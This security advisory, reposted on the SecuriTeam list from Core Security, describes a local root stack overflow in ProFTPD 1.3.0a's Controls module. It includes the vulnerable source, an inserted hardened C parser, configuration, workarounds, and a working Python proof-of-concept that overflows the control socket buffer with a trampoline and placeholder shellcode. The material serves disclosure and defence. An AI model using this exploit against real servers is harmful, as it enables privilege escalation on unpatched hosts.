[UNIX] ProFTPD Controls Buffer Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



ProFTPD Controls Buffer Overflow
------------------------------------------------------------------------


SUMMARY

A locally exploitable stack overflow vulnerability has been found in the
mod_ctrls module of the ProFTPD server.

ProFTPD is a commonly used and highly configurable FTP server for Unix and
Windows systems. It is available as an optional package in most recent
Linux distributions, including Debian (sid), Mandriva 2007 and Ubuntu Edgy.
For more information concerning ProFTPD, refer to http://www.proftpd.org/

The vulnerability is located in the "Controls" module. This is an optional
feature of the ProFTPD server, which must be enabled in the configuration
file. Controls are a way to communicate directly with a standalone ProFTPD
daemon while it is running. This gives administrators a way to alter the
daemon's behavior in real time, without having to restart the daemon and
have it re-read its configuration. The Controls feature allows authorized
users to locally manage parameters of the ProFTPD servers, such as
aborting connections, managing users, changing log levels, disabling
individual virtual servers, etc.

The vulnerability allows local attackers with access to the Controls
features (and who have been allowed by Controls ACLs in proftpd.conf) to
gain root privileges.

DETAILS

Vulnerable Systems:
* ProFTPD version 1.3.0a
* ProFTPD version 1.3.0

Immune Systems:
* ProFTPD version 1.3.1rc1

Technical Description - Exploit/Concept Code:
The vulnerability exists in the pr_ctrls_recv_request() function in
src/ctrls.c.

Analysis of the vulnerability follows:
(Code from ProFTPD 1.3.0a, src/ctrls.c)

int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
  pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
  char reqaction[512] = {'\0'}, *reqarg = NULL;
  size_t reqargsz = 0;
  unsigned int nreqargs = 0, reqarglen = 0;

  ...

  /* Next, read in the requested number of arguments. The client sends
   * the arguments in pairs: first the length of the argument, then the
   * argument itself. The first argument is the action, so get the first
   * matching pr_ctrls_t (if present), and add the remaining arguments to
   * it.
   */

  (1)

  if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
    pr_signals_unblock();
    return -1;
  }

  (2)

  if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
    pr_signals_unblock();
    return -1;
  }

  ...
}

In (1) the integer 'reqarglen' is fully controlled by the attacker, since
it is read directly from the control socket. It is then used unchecked as
the read size in (2), so the attacker controls how many bytes are written
into 'reqaction', a 512-byte buffer on the stack. Nothing compares
'reqarglen' against sizeof(reqaction); any length greater than 512
overflows the buffer and overwrites the saved registers and return
address that follow it.
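The missing check belongs between (1) and (2): the peer-supplied length must be validated against the buffer size before any data is copied. The following C program is an added example and not ProFTPD's code; it shows a bounds-checked version of that length-prefixed read, fed from an in-memory byte stream that stands in for the control socket so it runs offline. The names ctrl_stream, stream_read, read_full, recv_action_checked and parse_request, and the sample requests, are constructed here and do not come from ProFTPD. Beyond the page's single case, it also handles short and truncated reads, which the quoted code ignores.

```c
/* Added example, not ProFTPD's code: a bounds-checked version of the
 * length-prefixed argument read performed by pr_ctrls_recv_request().
 * As the advisory's quoted comment describes, each argument is sent as a
 * native-endian unsigned int length followed by that many bytes. To run
 * stand-alone, the control socket is replaced by an in-memory byte stream
 * (ctrl_stream, a constructed stand-in). */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define REQACTION_SZ 512   /* matches char reqaction[512] in src/ctrls.c */

/* Constructed stand-in for the control socket fd: a buffer plus cursor. */
typedef struct {
    const unsigned char *data;
    size_t len;
    size_t pos;
} ctrl_stream;

/* read(2)-like: copy up to n bytes, return bytes copied or -1 at EOF. */
static ssize_t stream_read(ctrl_stream *st, void *buf, size_t n) {
    if (st->pos >= st->len)
        return -1;
    size_t avail = st->len - st->pos;
    if (n > avail)
        n = avail;
    memcpy(buf, st->data + st->pos, n);
    st->pos += n;
    return (ssize_t)n;
}

/* Read exactly n bytes or fail; a bare read() may return a short count. */
static int read_full(ctrl_stream *st, void *buf, size_t n) {
    unsigned char *p = buf;
    while (n > 0) {
        ssize_t got = stream_read(st, p, n);
        if (got <= 0)
            return -1;
        p += got;
        n -= (size_t)got;
    }
    return 0;
}

/* Hardened counterpart of steps (1) and (2) in the advisory.
 * Returns 0 on success, -1 on I/O error or truncated input, and -2 when
 * the peer-supplied length would not fit in reqaction (one byte is kept
 * for the terminating NUL). The length is validated before any data is
 * copied, which is exactly the check the vulnerable code lacks. */
static int recv_action_checked(ctrl_stream *st, char *reqaction, size_t reqaction_sz) {
    unsigned int reqarglen = 0;

    if (read_full(st, &reqarglen, sizeof(reqarglen)) < 0)   /* (1) */
        return -1;
    if (reqarglen >= reqaction_sz)                          /* the missing check */
        return -2;
    if (read_full(st, reqaction, reqarglen) < 0)            /* (2) */
        return -1;
    reqaction[reqarglen] = '\0';
    return 0;
}

/* Test driver: encode a constructed request with a claimed length and a
 * body (the two may disagree, as a malformed client could send), then
 * parse it with the hardened routine. */
int parse_request(unsigned int claimed_len, const char *body, size_t body_len,
                  char *action, size_t action_sz) {
    unsigned char wire[64 + sizeof(unsigned int)];
    if (body_len > 64)
        return -99;
    memcpy(wire, &claimed_len, sizeof(claimed_len));
    memcpy(wire + sizeof(claimed_len), body, body_len);
    ctrl_stream st = { wire, sizeof(claimed_len) + body_len, 0 };
    return recv_action_checked(&st, action, action_sz);
}

int main(void) {
    char action[REQACTION_SZ];
    int rc = parse_request(4, "stop", 4, action, sizeof action);
    printf("well-formed : %d (%s)\n", rc, action);
    printf("oversized   : %d\n", parse_request(545, "AAAA", 4, action, sizeof action));
    printf("truncated   : %d\n", parse_request(8, "stop", 4, action, sizeof action));
    printf("huge length : %d\n", parse_request(0xffffffffu, "", 0, action, sizeof action));
    return 0;
}
```

A length of 545 (the size of a 512-byte filler plus the trailing stack fields) is rejected with -2 before a single byte of the body is read; in the vulnerable code the same length would be passed straight to read(). Rejecting the request is also the point at which a daemon should log the offending client, since an oversized Controls request from a local user is not something a legitimate ftpdctl client produces.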

Example of vulnerable configuration in proftpd.conf:

<IfModule mod_ctrls.c>
  ControlsEngine on
  ControlsACLs all allow group someuser
  ControlsMaxClients 2
  ControlsLog /var/log/proftpd/controls.log
  ControlsInterval 5
  ControlsSocket /tmp/ctrls.sock
  ControlsSocketOwner someuser someuser
  ControlsSocketACL allow group someuser
</IfModule>

ProFTPD must be compiled with mod_ctrls support (--enable-ctrls).

A simple working proof-of-concept (Python) is given in the Exploit section
below.

References:
For more information concerning the Controls module, refer to
http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html

Solution/Vendor Information/Workaround:
As a workaround, turn off the module mod_ctrls, with the following lines
added to proftpd.conf:

<IfModule mod_ctrls.c>
  ControlsEngine off
</IfModule>

Alternatively, administrators can use the ControlsACLs directive in
proftpd.conf to restrict access only to trusted local users.

Version 1.3.1rc1 of ProFTPD, which fixes this issue, is available on the
ProFTPD site: http://www.proftpd.org/

Exploit:
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow

import socket
import os, os.path, stat

# This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # innocuous "int 3"

# Build Payload. The format on the stack is:
#
# AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

# Setup socket
#
if os.path.exists(mySocket):
    os.remove(mySocket)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket, stat.S_IRWXU)
s.connect(ctrlSocket)

# Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255) + chr((l/255) & 255) + "\0\0")
s.send(payload)

# Finished
#
s.close()


ADDITIONAL INFORMATION

The information has been provided by CORE Security Technologies Advisories
(advisories@xxxxxxxxxxxxxxxx).
The original article can be found at:
http://www.coresecurity.com/?module=ContentMod&action=item&id=1594


